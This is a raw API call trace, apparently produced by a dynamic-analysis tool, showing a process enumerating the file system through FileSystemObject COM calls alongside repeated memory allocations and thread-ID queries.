	[0047.108] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0047.108] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x3ca310) returned 0x0
	[0047.108] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0047.108] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.109] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0047.109] free (_Block=0x3c85e0) 
	[0047.109] free (_Block=0x3cd840) 
	[0047.109] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0047.109] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0047.109] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6d0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.109] FileSystemObject:IUnknown:Release (This=0x42e6d0) returned 0x0
	[0047.110] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d198 | out: ppvObject=0x26d198*=0x0) returned 0x80004002
	[0047.110] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d400 | out: ppvObject=0x26d400*=0x3ca310) returned 0x0
	[0047.110] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0047.110] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.110] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0047.110] free (_Block=0x3c8430) 
	[0047.110] free (_Block=0x3cd730) 
	[0047.110] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0047.110] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0047.110] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e680, celt=0x1, rgvar=0x26dae8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.113] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d198 | out: ppvObject=0x26d198*=0x0) returned 0x80004002
	[0047.113] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d400 | out: ppvObject=0x26d400*=0x3ca310) returned 0x0
	[0047.113] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0047.113] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.113] GetCurrentThreadId () returned 0x9a8
	[0047.113] GetCurrentThreadId () returned 0x9a8
	[0047.113] ??2@YAPEAX_K@Z () returned 0x42e930
	[0047.114] malloc (_Size=0x80) returned 0x3c83a0
	[0047.115] GetTickCount () returned 0x11450b0
	[0047.116] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca3a0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0047.116] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca3a0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x3ca3a0) returned 0x0
	[0047.116] FileSystemObject:IUnknown:Release (This=0x3ca3a0) returned 0x1
	[0047.116] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca3a0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.116] FileSystemObject:IUnknown:Release (This=0x3ca3a0) returned 0x0
	[0047.117] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca3a0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0047.117] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca3a0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x3ca3a0) returned 0x0
	[0047.117] FileSystemObject:IUnknown:Release (This=0x3ca3a0) returned 0x1
	[0047.117] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca3a0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.117] FileSystemObject:IUnknown:Release (This=0x3ca3a0) returned 0x0
	[0047.117] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.117] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0047.118] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d198 | out: ppvObject=0x26d198*=0x0) returned 0x80004002
	[0047.118] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d400 | out: ppvObject=0x26d400*=0x3ca310) returned 0x0
	[0047.118] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0047.118] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.118] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0047.118] free (_Block=0x3c83a0) 
	[0047.118] free (_Block=0x3cd730) 
	[0047.118] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0047.118] ??3@YAXPEAX@Z () returned 0x2a00020001
	[0047.119] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e680, celt=0x1, rgvar=0x26dae8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.121] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d198 | out: ppvObject=0x26d198*=0x0) returned 0x80004002
	[0047.121] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d400 | out: ppvObject=0x26d400*=0x3ca310) returned 0x0
	[0047.121] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0047.121] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.121] GetCurrentThreadId () returned 0x9a8
	[0047.122] GetCurrentThreadId () returned 0x9a8
	[0047.122] ??2@YAPEAX_K@Z () returned 0x42e930
	[0047.122] malloc (_Size=0x80) returned 0x3c8310
	[0047.124] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca3a0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0047.124] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca3a0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x3ca3a0) returned 0x0
	[0047.124] FileSystemObject:IUnknown:Release (This=0x3ca3a0) returned 0x1
	[0047.124] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca3a0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.125] GetCurrentThreadId () returned 0x9a8
	[0047.125] GetCurrentThreadId () returned 0x9a8
	[0047.125] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0047.125] malloc (_Size=0x80) returned 0x3c84c0
	[0047.126] GetTickCount () returned 0x11450b0
	[0047.127] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca400, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0047.127] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca400, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca400) returned 0x0
	[0047.127] FileSystemObject:IUnknown:Release (This=0x3ca400) returned 0x1
	[0047.127] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca400, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.128] FileSystemObject:IUnknown:Release (This=0x3ca400) returned 0x0
	[0047.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca400, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0047.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca400, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca400) returned 0x0
	[0047.129] FileSystemObject:IUnknown:Release (This=0x3ca400) returned 0x1
	[0047.129] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca400, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.131] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca400, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42eb98, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0047.131] FileSystemObject:IUnknown:Release (This=0x3ca400) returned 0x0
	[0047.131] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca3a0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0047.138] GetCurrentThreadId () returned 0x9a8
	[0047.138] GetCurrentThreadId () returned 0x9a8
	[0047.138] ??2@YAPEAX_K@Z () returned 0x42eba0
	[0047.138] malloc (_Size=0x80) returned 0x3c8790
	[0047.167] GetCurrentThreadId () returned 0x9a8
	[0047.167] GetCurrentThreadId () returned 0x9a8
	[0047.167] ??2@YAPEAX_K@Z () returned 0x42ed20
	[0047.167] malloc (_Size=0x80) returned 0x3c8820
	[0047.205] GetCurrentThreadId () returned 0x9a8
	[0047.205] GetCurrentThreadId () returned 0x9a8
	[0047.205] ??2@YAPEAX_K@Z () returned 0x42ed20
	[0047.205] malloc (_Size=0x80) returned 0x3c8820
	[0047.242] GetCurrentThreadId () returned 0x9a8
	[0047.242] GetCurrentThreadId () returned 0x9a8
	[0047.243] ??2@YAPEAX_K@Z () returned 0x42eec0
	[0047.243] malloc (_Size=0x80) returned 0x3c8940
	[0047.351] GetCurrentThreadId () returned 0x9a8
	[0047.351] GetCurrentThreadId () returned 0x9a8
	[0047.351] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.351] malloc (_Size=0x80) returned 0x3c8940
	[0047.353] GetCurrentThreadId () returned 0x9a8
	[0047.353] GetCurrentThreadId () returned 0x9a8
	[0047.353] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.353] malloc (_Size=0x80) returned 0x3c8700
	[0047.374] GetCurrentThreadId () returned 0x9a8
	[0047.374] GetCurrentThreadId () returned 0x9a8
	[0047.374] ??2@YAPEAX_K@Z () returned 0x42ee70
	[0047.374] malloc (_Size=0x80) returned 0x3c8670
	[0047.496] GetCurrentThreadId () returned 0x9a8
	[0047.496] GetCurrentThreadId () returned 0x9a8
	[0047.496] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.496] malloc (_Size=0x80) returned 0x3c8670
	[0047.499] GetCurrentThreadId () returned 0x9a8
	[0047.499] GetCurrentThreadId () returned 0x9a8
	[0047.499] ??2@YAPEAX_K@Z () returned 0x42eda0
	[0047.499] malloc (_Size=0x80) returned 0x3c89d0
	[0047.549] GetCurrentThreadId () returned 0x9a8
	[0047.549] GetCurrentThreadId () returned 0x9a8
	[0047.549] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.549] malloc (_Size=0x80) returned 0x3c88b0
	[0047.661] GetCurrentThreadId () returned 0x9a8
	[0047.661] GetCurrentThreadId () returned 0x9a8
	[0047.661] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.661] malloc (_Size=0x80) returned 0x3c8820
	[0047.808] GetCurrentThreadId () returned 0x9a8
	[0047.808] GetCurrentThreadId () returned 0x9a8
	[0047.808] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.808] malloc (_Size=0x80) returned 0x3c8670
	[0047.823] GetCurrentThreadId () returned 0x9a8
	[0047.823] GetCurrentThreadId () returned 0x9a8
	[0047.823] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.823] malloc (_Size=0x80) returned 0x3c89d0
	[0047.824] GetCurrentThreadId () returned 0x9a8
	[0047.824] GetCurrentThreadId () returned 0x9a8
	[0047.825] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.825] malloc (_Size=0x80) returned 0x3c8820
	[0047.825] GetCurrentThreadId () returned 0x9a8
	[0047.825] GetCurrentThreadId () returned 0x9a8
	[0047.825] ??2@YAPEAX_K@Z () returned 0x42eda0
	[0047.825] malloc (_Size=0x80) returned 0x3c85e0
	[0047.837] GetCurrentThreadId () returned 0x9a8
	[0047.837] GetCurrentThreadId () returned 0x9a8
	[0047.837] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.837] malloc (_Size=0x80) returned 0x3c85e0
	[0047.848] GetCurrentThreadId () returned 0x9a8
	[0047.848] GetCurrentThreadId () returned 0x9a8
	[0047.848] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.848] malloc (_Size=0x80) returned 0x3c8670
	[0047.851] GetCurrentThreadId () returned 0x9a8
	[0047.851] GetCurrentThreadId () returned 0x9a8
	[0047.852] ??2@YAPEAX_K@Z () returned 0x42eda0
	[0047.852] malloc (_Size=0x80) returned 0x3c88b0
	[0047.859] GetCurrentThreadId () returned 0x9a8
	[0047.859] GetCurrentThreadId () returned 0x9a8
	[0047.859] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.859] malloc (_Size=0x80) returned 0x3c88b0
	[0047.861] GetCurrentThreadId () returned 0x9a8
	[0047.861] GetCurrentThreadId () returned 0x9a8
	[0047.862] ??2@YAPEAX_K@Z () returned 0x42ed40
	[0047.862] malloc (_Size=0x80) returned 0x3c85e0
	[0047.863] GetCurrentThreadId () returned 0x9a8
	[0047.863] GetCurrentThreadId () returned 0x9a8
	[0047.863] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0047.863] malloc (_Size=0x80) returned 0x3c89d0
	[0047.863] GetCurrentThreadId () returned 0x9a8
	[0047.863] GetCurrentThreadId () returned 0x9a8
	[0047.863] ??2@YAPEAX_K@Z () returned 0x3cabe0
	[0047.863] malloc (_Size=0x80) returned 0x3c8700
	[0047.866] GetCurrentThreadId () returned 0x9a8
	[0047.866] GetCurrentThreadId () returned 0x9a8
	[0047.866] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0047.866] malloc (_Size=0x80) returned 0x3c88b0
	[0047.867] GetCurrentThreadId () returned 0x9a8
	[0047.867] GetCurrentThreadId () returned 0x9a8
	[0047.867] ??2@YAPEAX_K@Z () returned 0x42ec30
	[0047.867] malloc (_Size=0x80) returned 0x3c8670
	[0047.867] GetCurrentThreadId () returned 0x9a8
	[0047.867] GetCurrentThreadId () returned 0x9a8
	[0047.867] ??2@YAPEAX_K@Z () returned 0x42ed30
	[0047.867] malloc (_Size=0x80) returned 0x3c8700
	[0047.867] GetCurrentThreadId () returned 0x9a8
	[0047.867] GetCurrentThreadId () returned 0x9a8
	[0047.867] ??2@YAPEAX_K@Z () returned 0x42eed0
	[0047.867] malloc (_Size=0x80) returned 0x3c8a60
	[0047.873] GetCurrentThreadId () returned 0x9a8
	[0047.873] GetCurrentThreadId () returned 0x9a8
	[0047.873] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0047.873] malloc (_Size=0x80) returned 0x3c8790
	[0047.876] GetCurrentThreadId () returned 0x9a8
	[0047.876] GetCurrentThreadId () returned 0x9a8
	[0047.876] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.876] malloc (_Size=0x80) returned 0x3c85e0
	[0047.890] GetCurrentThreadId () returned 0x9a8
	[0047.890] GetCurrentThreadId () returned 0x9a8
	[0047.890] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.890] malloc (_Size=0x80) returned 0x3c8670
	[0047.939] GetCurrentThreadId () returned 0x9a8
	[0047.939] GetCurrentThreadId () returned 0x9a8
	[0047.939] ??2@YAPEAX_K@Z () returned 0x42ed00
	[0047.939] malloc (_Size=0x80) returned 0x3c85e0
	[0047.945] GetCurrentThreadId () returned 0x9a8
	[0047.945] GetCurrentThreadId () returned 0x9a8
	[0047.945] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.945] malloc (_Size=0x80) returned 0x3c8550
	[0047.961] GetCurrentThreadId () returned 0x9a8
	[0047.961] GetCurrentThreadId () returned 0x9a8
	[0047.961] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0047.961] malloc (_Size=0x80) returned 0x3c88b0
	[0047.967] GetCurrentThreadId () returned 0x9a8
	[0047.967] GetCurrentThreadId () returned 0x9a8
	[0047.967] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0047.967] malloc (_Size=0x80) returned 0x3c85e0
	[0047.975] GetCurrentThreadId () returned 0x9a8
	[0047.975] GetCurrentThreadId () returned 0x9a8
	[0047.975] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0047.975] malloc (_Size=0x80) returned 0x3c8670
	[0048.246] GetCurrentThreadId () returned 0x9a8
	[0048.246] GetCurrentThreadId () returned 0x9a8
	[0048.246] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0048.246] malloc (_Size=0x80) returned 0x3c8790
	[0048.263] GetCurrentThreadId () returned 0x9a8
	[0048.263] GetCurrentThreadId () returned 0x9a8
	[0048.263] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0048.263] malloc (_Size=0x80) returned 0x3c85e0
	[0048.264] GetCurrentThreadId () returned 0x9a8
	[0048.264] GetCurrentThreadId () returned 0x9a8
	[0048.264] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0048.264] malloc (_Size=0x80) returned 0x3c8430
	[0048.268] GetCurrentThreadId () returned 0x9a8
	[0048.268] GetCurrentThreadId () returned 0x9a8
	[0048.268] ??2@YAPEAX_K@Z () returned 0x42ec30
	[0048.268] malloc (_Size=0x80) returned 0x3c8700
	[0048.281] GetCurrentThreadId () returned 0x9a8
	[0048.281] GetCurrentThreadId () returned 0x9a8
	[0048.281] ??2@YAPEAX_K@Z () returned 0x42edd0
	[0048.281] malloc (_Size=0x80) returned 0x3c89d0
	[0048.287] GetCurrentThreadId () returned 0x9a8
	[0048.287] GetCurrentThreadId () returned 0x9a8
	[0048.287] ??2@YAPEAX_K@Z () returned 0x42ea30
	[0048.287] malloc (_Size=0x80) returned 0x3c88b0
	[0048.287] GetCurrentThreadId () returned 0x9a8
	[0048.287] GetCurrentThreadId () returned 0x9a8
	[0048.287] ??2@YAPEAX_K@Z () returned 0x42eba0
	[0048.287] malloc (_Size=0x80) returned 0x3c84c0
	[0049.012] GetCurrentThreadId () returned 0x9a8
	[0049.012] GetCurrentThreadId () returned 0x9a8
	[0049.012] ??2@YAPEAX_K@Z () returned 0x42ed10
	[0049.012] malloc (_Size=0x80) returned 0x3c8820
	[0049.032] GetCurrentThreadId () returned 0x9a8
	[0049.032] GetCurrentThreadId () returned 0x9a8
	[0049.032] ??2@YAPEAX_K@Z () returned 0x42eb30
	[0049.032] malloc (_Size=0x80) returned 0x3c8820
	[0049.122] GetCurrentThreadId () returned 0x9a8
	[0049.122] GetCurrentThreadId () returned 0x9a8
	[0049.122] ??2@YAPEAX_K@Z () returned 0x42eba0
	[0049.122] malloc (_Size=0x80) returned 0x3c8790
	[0049.128] GetCurrentThreadId () returned 0x9a8
	[0049.128] GetCurrentThreadId () returned 0x9a8
	[0049.128] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0049.128] malloc (_Size=0x80) returned 0x3c8430
	[0049.176] GetCurrentThreadId () returned 0x9a8
	[0049.176] GetCurrentThreadId () returned 0x9a8
	[0049.176] ??2@YAPEAX_K@Z () returned 0x42ed10
	[0049.176] malloc (_Size=0x80) returned 0x3c8550
	[0049.354] GetCurrentThreadId () returned 0x9a8
	[0049.354] GetCurrentThreadId () returned 0x9a8
	[0049.354] ??2@YAPEAX_K@Z () returned 0x42eba0
	[0049.354] malloc (_Size=0x80) returned 0x3c8430
	[0049.383] GetCurrentThreadId () returned 0x9a8
	[0049.383] GetCurrentThreadId () returned 0x9a8
	[0049.383] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0049.383] malloc (_Size=0x80) returned 0x3c8700
	[0049.393] GetCurrentThreadId () returned 0x9a8
	[0049.393] GetCurrentThreadId () returned 0x9a8
	[0049.393] ??2@YAPEAX_K@Z () returned 0x42ee40
	[0049.393] malloc (_Size=0x80) returned 0x3c8670
	[0049.398] GetCurrentThreadId () returned 0x9a8
	[0049.398] GetCurrentThreadId () returned 0x9a8
	[0049.398] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0049.398] malloc (_Size=0x80) returned 0x3c8940
	[0049.782] GetCurrentThreadId () returned 0x9a8
	[0049.782] GetCurrentThreadId () returned 0x9a8
	[0049.782] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0049.782] malloc (_Size=0x80) returned 0x3c84c0
	[0049.806] GetCurrentThreadId () returned 0x9a8
	[0049.806] GetCurrentThreadId () returned 0x9a8
	[0049.806] ??2@YAPEAX_K@Z () returned 0x42ed10
	[0049.806] malloc (_Size=0x80) returned 0x3c8670
	[0049.828] GetCurrentThreadId () returned 0x9a8
	[0049.828] GetCurrentThreadId () returned 0x9a8
	[0049.828] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0049.828] malloc (_Size=0x80) returned 0x3c89d0
	[0049.829] GetCurrentThreadId () returned 0x9a8
	[0049.829] GetCurrentThreadId () returned 0x9a8
	[0049.829] ??2@YAPEAX_K@Z () returned 0x42eda0
	[0049.829] malloc (_Size=0x80) returned 0x3c8940
	[0049.830] GetCurrentThreadId () returned 0x9a8
	[0049.830] GetCurrentThreadId () returned 0x9a8
	[0049.830] ??2@YAPEAX_K@Z () returned 0x42eca0
	[0049.830] malloc (_Size=0x80) returned 0x3c8700
	[0049.869] GetCurrentThreadId () returned 0x9a8
	[0049.869] GetCurrentThreadId () returned 0x9a8
	[0049.869] ??2@YAPEAX_K@Z () returned 0x42ed10
	[0049.870] malloc (_Size=0x80) returned 0x3c84c0
	[0049.870] GetCurrentThreadId () returned 0x9a8
	[0049.870] GetCurrentThreadId () returned 0x9a8
	[0049.870] ??2@YAPEAX_K@Z () returned 0x42eeb0
	[0049.870] malloc (_Size=0x80) returned 0x3c8550
	[0049.871] GetCurrentThreadId () returned 0x9a8
	[0049.871] GetCurrentThreadId () returned 0x9a8
	[0049.871] ??2@YAPEAX_K@Z () returned 0x3caba0
	[0049.871] malloc (_Size=0x80) returned 0x3c8a60
	[0049.875] GetCurrentThreadId () returned 0x9a8
	[0049.875] GetCurrentThreadId () returned 0x9a8
	[0049.875] ??2@YAPEAX_K@Z () returned 0x3cab80
	[0049.875] malloc (_Size=0x80) returned 0x3c8820
	[0049.881] GetCurrentThreadId () returned 0x9a8
	[0049.881] GetCurrentThreadId () returned 0x9a8
	[0049.881] ??2@YAPEAX_K@Z () returned 0x42ee10
	[0049.881] malloc (_Size=0x80) returned 0x3c8a60
	[0049.972] GetCurrentThreadId () returned 0x9a8
	[0049.973] GetCurrentThreadId () returned 0x9a8
	[0049.973] ??2@YAPEAX_K@Z () returned 0x42eeb0
	[0049.973] malloc (_Size=0x80) returned 0x3c89d0
	[0049.976] GetCurrentThreadId () returned 0x9a8
	[0049.976] GetCurrentThreadId () returned 0x9a8
	[0049.976] ??2@YAPEAX_K@Z () returned 0x3caae0
	[0049.976] malloc (_Size=0x80) returned 0x3c8820
	[0050.031] GetCurrentThreadId () returned 0x9a8
	[0050.032] GetCurrentThreadId () returned 0x9a8
